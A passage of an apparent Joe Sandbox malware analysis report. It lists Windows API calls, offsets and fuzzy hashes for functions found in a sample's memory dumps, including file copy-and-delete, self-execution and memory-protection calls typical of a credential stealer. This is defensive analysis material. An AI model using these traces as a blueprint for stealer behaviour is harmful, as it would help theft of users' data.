                                                        • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                        • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                        • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                        • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3466090806-0
                                                        • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                        • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                                        • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                        • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02CF151B
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02CF1522
                                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 02CF153E
                                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 02CF155C
                                                        • RegCloseKey.ADVAPI32(?), ref: 02CF1566
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3225020163-0
                                                        • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                        • Instruction ID: 206ebc3908fa9c8e80a9b619a68d852c11b1e4a1cacb4b0e78eaf82f55c24121
                                                        • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                        • Instruction Fuzzy Hash: 5101CDBDA40208BFDB14DFE4DC49FAEB7B9EB48705F108159FA0597280D6759A018F91
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0041C74E
                                                          • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                          • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                        • __getptd.LIBCMT ref: 0041C765
                                                        • __amsg_exit.LIBCMT ref: 0041C773
                                                        • __lock.LIBCMT ref: 0041C783
                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                        • String ID:
                                                        • API String ID: 938513278-0
                                                        • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                        • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                                        • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                        • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                                        APIs
                                                        • __getptd.LIBCMT ref: 02D0C9B5
                                                          • Part of subcall function 02D0C206: __getptd_noexit.LIBCMT ref: 02D0C209
                                                          • Part of subcall function 02D0C206: __amsg_exit.LIBCMT ref: 02D0C216
                                                        • __getptd.LIBCMT ref: 02D0C9CC
                                                        • __amsg_exit.LIBCMT ref: 02D0C9DA
                                                        • __lock.LIBCMT ref: 02D0C9EA
                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 02D0C9FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                        • String ID:
                                                        • API String ID: 938513278-0
                                                        • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                        • Instruction ID: f14b5f2a5a75629325a72c5c5e4f739428e1b5abe95af961f5651eba64895ad2
                                                        • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                        • Instruction Fuzzy Hash: C0F06D32E543109BD720BBB8688271D33A1EF08729F10820BE814A73F0DB645E40DFAA
                                                        APIs
                                                        • StrCmpCA.SHLWAPI(00000000,02EB5F98), ref: 0041079A
                                                        • StrCmpCA.SHLWAPI(00000000,02EB5F68), ref: 00410866
                                                        • StrCmpCA.SHLWAPI(00000000,02EB5FC8), ref: 0041099D
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy
                                                        • String ID: `_A
                                                        • API String ID: 3722407311-2339250863
                                                        • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                        • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                                        • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                        • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                                        APIs
                                                        • StrCmpCA.SHLWAPI(00000000,02EB5F98), ref: 0041079A
                                                        • StrCmpCA.SHLWAPI(00000000,02EB5F68), ref: 00410866
                                                        • StrCmpCA.SHLWAPI(00000000,02EB5FC8), ref: 0041099D
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy
                                                        • String ID: `_A
                                                        • API String ID: 3722407311-2339250863
                                                        • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                        • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                                        • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                        • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                                        • ExitProcess.KERNEL32 ref: 00416755
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                        • String ID: <
                                                        • API String ID: 1148417306-4251816714
                                                        • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                        • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                                        • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                        • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 02D068CA
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 02D0698D
                                                        • ExitProcess.KERNEL32 ref: 02D069BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                        • String ID: <
                                                        • API String ID: 1148417306-4251816714
                                                        • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                        • Instruction ID: 67bba3c73a9c4556896bc2d4b5ee9b5f2baf60172dd0f552b4e2a973e61265f6
                                                        • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                        • Instruction Fuzzy Hash: CC3116B5901218ABDB14EB90DD95FDEB77AEF04300F404189E305A62E0DF746B88CF69
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: @Jn@$Jn@$Jn@
                                                        • API String ID: 544645111-1180188686
                                                        • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                        • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                                        • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                        • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                                        APIs
                                                        • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                        • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcatlstrcpy
                                                        • String ID: vI@$vI@
                                                        • API String ID: 3905823039-1245421781
                                                        • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                        • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                                        • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                        • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                        • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                        • wsprintfW.USER32 ref: 00418D78
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocProcesswsprintf
                                                        • String ID: %hs
                                                        • API String ID: 659108358-2783943728
                                                        • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                        • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                                        • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                        • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                                        APIs
                                                        • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                        • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$CloseFileNextlstrcat
                                                        • String ID: !=A$P2Wu
                                                        • API String ID: 3840410801-1350064450
                                                        • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                        • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                                        • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                        • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02E84C48,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                                        • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                        • String ID:
                                                        • API String ID: 257331557-0
                                                        • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                        • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                                        • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                        • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                          • Part of subcall function 02D08DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02CF1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D08DED
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02CFA548
                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 02CFA666
                                                        • lstrlen.KERNEL32(00000000), ref: 02CFA923
                                                          • Part of subcall function 02D0AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D0AA4D
                                                          • Part of subcall function 02CFA077: memcmp.MSVCRT(?,00421264,00000003), ref: 02CFA094
                                                        • DeleteFileA.KERNEL32(00000000), ref: 02CFA9AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                        • String ID:
                                                        • API String ID: 257331557-0
                                                        • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                        • Instruction ID: 809d2f30786bf48254514f8310ef4c07697204fc449d79c569d767eca638e8a9
                                                        • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                        • Instruction Fuzzy Hash: 0EE1BC769102189BCB09EBA4DDD0EEEB33AEF54304F508159E656B61E0EE346E48CF71
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02E84C48,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                        • String ID:
                                                        • API String ID: 211194620-0
                                                        • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                        • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                                        • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
